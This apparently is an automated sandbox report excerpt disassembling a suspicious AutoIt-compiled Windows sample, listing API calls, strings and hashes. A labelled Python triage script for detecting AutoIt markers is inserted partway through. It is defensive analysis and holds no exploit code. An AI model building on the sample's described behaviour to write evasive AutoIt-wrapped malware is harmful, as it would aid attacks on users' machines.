                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction ID: 31a1fc19b3046201ee1f1e8a35df6f74ebf502a90579d6ec6f59e0dd7e7b42e5
                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                        • Instruction Fuzzy Hash: 96019678A0010AEFCB84DF99C5909AEF7B6FF48710F20859AE819A7351D734AE41DB84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction ID: e77a1096340d5e1726e71128e9a7d0a60bda9f0390de5fde637c40e0c7f5f35f
                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                        • Instruction Fuzzy Hash: 6B019678A00109EFCB84DF98C5909AEF7B6FB48710F20859AD915A7751D734AE41DF80
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 0013785B
                                                        • DeleteObject.GDI32(00000000), ref: 0013786D
                                                        • DestroyWindow.USER32 ref: 0013787B
                                                        • GetDesktopWindow.USER32 ref: 00137895
                                                        • GetWindowRect.USER32(00000000), ref: 0013789C
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 001379DD
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 001379ED
                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137A35
                                                        • GetClientRect.USER32(00000000,?), ref: 00137A41
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00137A7B
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137A9D
                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AB0
                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137ABB
                                                        • GlobalLock.KERNEL32(00000000), ref: 00137AC4
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AD3
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00137ADC
                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137AE3
                                                        • GlobalFree.KERNEL32(00000000), ref: 00137AEE
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137B00
                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00152CAC,00000000), ref: 00137B16
                                                        • GlobalFree.KERNEL32(00000000), ref: 00137B26
                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00137B4C
                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00137B6B
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137B8D
                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00137D7A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                        • API String ID: 2211948467-2373415609
                                                        • Opcode ID: 68235301afe6594e9b3c3a0159ace16a7b99ef7ed4ff27a835373fca36b9c19f
                                                        • Instruction ID: 1272b298f1739df00c3fc779ef257f836359f68f8f22e7bd20ac896e89eeef1e
                                                        • Opcode Fuzzy Hash: 68235301afe6594e9b3c3a0159ace16a7b99ef7ed4ff27a835373fca36b9c19f
                                                        • Instruction Fuzzy Hash: A6027BB5900115EFDB14DFA4DD89EAE7BB9FF49320F148158F905AB2A1CB30AD42CB60
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,0014F910), ref: 00143627
                                                        • IsWindowVisible.USER32(?), ref: 0014364B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpperVisibleWindow
                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                        • API String ID: 4105515805-45149045
                                                        • Opcode ID: 64129623adbb1e6e58e8db2178ae9306820fc8f53b477a8f58918593d80fed75
                                                        • Instruction ID: 99d23ce4ce4f7222dc13b84705f14cc67fe43c4acc045c13f6c71627b71c9dc4
                                                        • Opcode Fuzzy Hash: 64129623adbb1e6e58e8db2178ae9306820fc8f53b477a8f58918593d80fed75
                                                        • Instruction Fuzzy Hash: ECD172702043019FCB08EF10C555AAEB7A1AF95354F15846CF8956B3B3DB31EE8ACB52
                                                        APIs
                                                        • SetTextColor.GDI32(?,00000000), ref: 0014A630
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0014A661
                                                        • GetSysColor.USER32(0000000F), ref: 0014A66D
                                                        • SetBkColor.GDI32(?,000000FF), ref: 0014A687
                                                        • SelectObject.GDI32(?,00000000), ref: 0014A696
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0014A6C1
                                                        • GetSysColor.USER32(00000010), ref: 0014A6C9
                                                        • CreateSolidBrush.GDI32(00000000), ref: 0014A6D0
                                                        • FrameRect.USER32(?,?,00000000), ref: 0014A6DF
                                                        • DeleteObject.GDI32(00000000), ref: 0014A6E6
                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0014A731
                                                        • FillRect.USER32(?,?,00000000), ref: 0014A763
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0014A78E
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(00000012), ref: 0014A903
                                                          • Part of subcall function 0014A8CA: SetTextColor.GDI32(?,?), ref: 0014A907
                                                          • Part of subcall function 0014A8CA: GetSysColorBrush.USER32(0000000F), ref: 0014A91D
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(0000000F), ref: 0014A928
                                                          • Part of subcall function 0014A8CA: GetSysColor.USER32(00000011), ref: 0014A945
                                                          • Part of subcall function 0014A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0014A953
                                                          • Part of subcall function 0014A8CA: SelectObject.GDI32(?,00000000), ref: 0014A964
                                                          • Part of subcall function 0014A8CA: SetBkColor.GDI32(?,00000000), ref: 0014A96D
                                                          • Part of subcall function 0014A8CA: SelectObject.GDI32(?,?), ref: 0014A97A
                                                          • Part of subcall function 0014A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0014A999
                                                          • Part of subcall function 0014A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0014A9B0
                                                          • Part of subcall function 0014A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0014A9C5
                                                          • Part of subcall function 0014A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0014A9ED
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 3521893082-0
                                                        • Opcode ID: 6f3e6e03228c9863a27d3ecd6720f8279eda9d4d14f85e266ee5fdf3d9ca76e1
                                                        • Instruction ID: 0bc04b7490faa1d988457336f5ed8381d086927eb2cd06f677c64292539ecca9
                                                        • Opcode Fuzzy Hash: 6f3e6e03228c9863a27d3ecd6720f8279eda9d4d14f85e266ee5fdf3d9ca76e1
                                                        • Instruction Fuzzy Hash: 66918C76008301EFD7109F64DC08A5B7BA9FF89321F510A2DF9629A2B1D771D986CB52
                                                        APIs
                                                        • DestroyWindow.USER32(00000000), ref: 001374DE
                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0013759D
                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001375DB
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 001375ED
                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00137633
                                                        • GetClientRect.USER32(00000000,?), ref: 0013763F
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00137683
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00137692
                                                        • GetStockObject.GDI32(00000011), ref: 001376A2
                                                        • SelectObject.GDI32(00000000,00000000), ref: 001376A6
                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001376B6
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001376BF
                                                        • DeleteDC.GDI32(00000000), ref: 001376C8
                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001376F4
                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0013770B
                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00137746
                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0013775A
                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0013776B
                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0013779B
                                                        • GetStockObject.GDI32(00000011), ref: 001377A6
                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001377B1
                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 001377BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                        • API String ID: 2910397461-517079104
                                                        • Opcode ID: d1873d3b667dae066e84e612f878a6a8b547283f048ede1489b8bd53280ebff1
                                                        • Instruction ID: 728a39a0aa63f7e1fa61ccf72563dbf5034beab13076a3fbd9c709f3b3d66af9
                                                        • Opcode Fuzzy Hash: d1873d3b667dae066e84e612f878a6a8b547283f048ede1489b8bd53280ebff1
                                                        • Instruction Fuzzy Hash: 7CA175B5A40615BFEB14DBA4DC49FAE7B7AEB09710F004118FA15A76E1CB70AD41CB60
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012AD1E
                                                        • GetDriveTypeW.KERNEL32(?,0014FAC0,?,\\.\,0014F910), ref: 0012ADFB
                                                        • SetErrorMode.KERNEL32(00000000,0014FAC0,?,\\.\,0014F910), ref: 0012AF59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DriveType
                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                        • API String ID: 2907320926-4222207086
                                                        • Opcode ID: 29b022e5eeb9a0a30f8dbf2998854d19c52fed5f9018989140872e5bd2d63027
                                                        • Instruction ID: 29e6c33571cc43c8503d447d2b65c1d69a82c51191a801b8e978e9ed2630f651
                                                        • Opcode Fuzzy Hash: 29b022e5eeb9a0a30f8dbf2998854d19c52fed5f9018989140872e5bd2d63027
                                                        • Instruction Fuzzy Hash: E151D6B1688319EBCB04DB10EA86DBD73B1EF087107A1805BF40BA7291DB349D62DB43
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                        • API String ID: 1038674560-86951937
                                                        • Opcode ID: f50c1796167158467eff751cc9c595ef49e398f70dd81b1603fc64d2b212d2e6
                                                        • Instruction ID: e99b3fbee076f076100d0bf1ae41ecdbc3f23931896d2847fda03f3bb0977c6c
                                                        • Opcode Fuzzy Hash: f50c1796167158467eff751cc9c595ef49e398f70dd81b1603fc64d2b212d2e6
                                                        • Instruction Fuzzy Hash: 65811AB1644249AACB30AB61DC47FFE7BA8EF05700F14402CF9456B1D3EB72DA45D651
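The directive strings listed for this function ("#OnAutoItStartRegister", "#requireadmin", "#pragma compile", the "Bad directive syntax error" and "Cannot parse #include" messages) together with the "AutoIt v3" window class seen in the CreateWindowExW call above are what identify the outer binary as the AutoIt v3 interpreter stub. The following triage script is an added example, not part of the Joe Sandbox report and not code from the sample; it scans a file for those markers in both ASCII and UTF-16LE form (the calls here are the W variants, so the strings are wide in the image). The "AU3!EA06" magic of the embedded compiled-script resource is assumed from general AutoIt knowledge, not from this report, and the sample bytes are constructed for the test.

```python
# Triage helper: does a PE carry the AutoIt v3 interpreter stub?
# Added example; marker strings are taken from the disassembly listing
# above except "AU3!EA06", which is an assumed, well-known resource magic.
import sys

AUTOIT_MARKERS = {
    "runtime_window_class": [b"AutoIt v3", b"AutoIt v3 GUI"],
    "script_directives": [
        b"#OnAutoItStartRegister", b"#requireadmin", b"#notrayicon",
        b"#pragma compile", b"#include-once",
    ],
    "script_errors": [
        b"Bad directive syntax error", b"Cannot parse #include",
        b"Unterminated group of comments",
    ],
    # Assumed marker (not shown in this report): header of the embedded script.
    "compiled_script_magic": [b"AU3!EA06"],
}


def _encodings(marker: bytes):
    """Both byte forms a marker can take: narrow ASCII and wide UTF-16LE."""
    return (marker, marker.decode("ascii").encode("utf-16-le"))


def find_autoit_markers(data: bytes) -> dict:
    """Return {category: [marker, ...]} for every marker present in data."""
    hits = {}
    for category, markers in AUTOIT_MARKERS.items():
        found = [m.decode() for m in markers
                 if any(enc in data for enc in _encodings(m))]
        if found:
            hits[category] = found
    return hits


def is_likely_compiled_autoit(data: bytes, min_categories: int = 2) -> bool:
    """Heuristic verdict: demand hits in at least two independent categories
    so a single incidental string (e.g. a GUI title) does not trigger it."""
    return len(find_autoit_markers(data)) >= min_categories


def _wide(s: str) -> bytes:
    return s.encode("utf-16-le")


def build_sample() -> bytes:
    """Constructed stand-in for a compiled AutoIt binary (test input only,
    not bytes from the analysed sample): wide strings as they appear in a
    W-API image, plus the assumed AU3! magic."""
    return (b"MZ" + b"\x00" * 64
            + _wide("AutoIt v3") + b"\x00" * 16
            + _wide("#OnAutoItStartRegister") + b"\x00" * 8
            + _wide("Bad directive syntax error") + b"\x00" * 8
            + b"AU3!EA06" + b"\x00" * 32)


def build_negative_sample() -> bytes:
    """Constructed benign stand-in with an unrelated wide string."""
    return b"MZ" + b"\x00" * 64 + _wide("Hello, world") + b"\x00" * 32


if __name__ == "__main__":
    # Usage: python autoit_triage.py <file>; with no argument the constructed sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    verdict = "likely compiled AutoIt" if is_likely_compiled_autoit(data) else "no AutoIt stub markers"
    print("verdict:", verdict)
    for category, found in find_autoit_markers(data).items():
        print(f"  {category}: {', '.join(found)}")
```

A positive result identifies only the wrapper: AutoIt is a legitimate scripting runtime, and the malicious behaviour comes from the script and payload it carries, which this string check does not examine. Treat the verdict as a reason to extract and inspect the embedded script, not as a malware verdict on its own.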
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00149AD2
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00149B8B
                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00149BA7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window
                                                        • String ID: 0
                                                        • API String ID: 2326795674-4108050209
                                                        • Opcode ID: eb656008deee818738cab36798a8e42ab63cc3ed6a1392897f595dd36e35b3f3
                                                        • Instruction ID: 87e2028c1417bdd78b27bcb54fb217e86c00058061517b74d62e6125fa7fef98
                                                        • Opcode Fuzzy Hash: eb656008deee818738cab36798a8e42ab63cc3ed6a1392897f595dd36e35b3f3
                                                        • Instruction Fuzzy Hash: AB02BC70104201AFEB25CF24C889BABBBE5FF89314F04852DF999962B1C775D945CB92
                                                        APIs
                                                        • GetSysColor.USER32(00000012), ref: 0014A903
                                                        • SetTextColor.GDI32(?,?), ref: 0014A907
                                                        • GetSysColorBrush.USER32(0000000F), ref: 0014A91D
                                                        • GetSysColor.USER32(0000000F), ref: 0014A928
                                                        • CreateSolidBrush.GDI32(?), ref: 0014A92D
                                                        • GetSysColor.USER32(00000011), ref: 0014A945
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0014A953
                                                        • SelectObject.GDI32(?,00000000), ref: 0014A964
                                                        • SetBkColor.GDI32(?,00000000), ref: 0014A96D
                                                        • SelectObject.GDI32(?,?), ref: 0014A97A
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0014A999
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0014A9B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0014A9C5
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0014A9ED
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0014AA14
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0014AA32
                                                        • DrawFocusRect.USER32(?,?), ref: 0014AA3D
                                                        • GetSysColor.USER32(00000011), ref: 0014AA4B
                                                        • SetTextColor.GDI32(?,00000000), ref: 0014AA53
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0014AA67
                                                        • SelectObject.GDI32(?,0014A5FA), ref: 0014AA7E
                                                        • DeleteObject.GDI32(?), ref: 0014AA89
                                                        • SelectObject.GDI32(?,?), ref: 0014AA8F
                                                        • DeleteObject.GDI32(?), ref: 0014AA94
                                                        • SetTextColor.GDI32(?,?), ref: 0014AA9A
                                                        • SetBkColor.GDI32(?,?), ref: 0014AAA4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: 4449e0a42d0dff92f0bf281b7241059412c6cfa1a22fe949b488f70ff3b8f3f4
                                                        • Instruction ID: 2f32e1a5380c91802475930f06a6ca300d2cbd8df4df74f7ea4c01656d7f8527
                                                        • Opcode Fuzzy Hash: 4449e0a42d0dff92f0bf281b7241059412c6cfa1a22fe949b488f70ff3b8f3f4
                                                        • Instruction Fuzzy Hash: 81514C75900208FFDB109FA4DC48EAE7BB9EF49320F124629F911AB2B1D7719981DF90
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00148AC1
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00148AD2
                                                        • CharNextW.USER32(0000014E), ref: 00148B01
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00148B42
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00148B58
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00148B69
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00148B86
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00148BD8
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00148BEE
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00148C1F
                                                        • _memset.LIBCMT ref: 00148C44
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00148C8D
                                                        • _memset.LIBCMT ref: 00148CEC
                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00148D16
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00148D6E
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00148E1B
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00148E3D
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00148E87
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00148EB4
                                                        • DrawMenuBar.USER32(?), ref: 00148EC3
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00148EEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                         • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
